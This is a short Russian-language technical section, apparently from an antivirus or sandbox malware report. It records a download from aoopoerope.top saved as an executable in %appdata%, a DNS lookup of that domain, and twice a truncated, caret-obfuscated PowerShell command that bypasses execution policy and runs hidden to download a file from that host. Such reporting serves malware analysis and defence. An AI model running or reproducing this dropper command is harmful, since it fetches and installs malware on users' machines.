Техническая информация
- http://www.aoopoerope.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWE^RSHell.EXe ^-E^Xecution^po^LIcy ByPass ^-N^oPRo^fI^LE -^wInD^oWs^T^Yl^E hi^dDEn^ (^N^ew^-^ObjE^ct^ sys^te^M.NEt.^w^eB^cli^eNt).^DOWnLO^AdFi^Le('http://www.aoopoerope.to...
- DNS ASK ao###erope.top
- '<SYSTEM32>\cmd.exe' /c "P^oWE^RSHell.EXe ^-E^Xecution^po^LIcy ByPass ^-N^oPRo^fI^LE -^wInD^oWs^T^Yl^E hi^dDEn^ (^N^ew^-^ObjE^ct^ sys^te^M.NEt.^w^eB^cli^eNt).^DOWnLO^AdFi^Le('http://www.aoopoerope.to...' (со скрытым окном)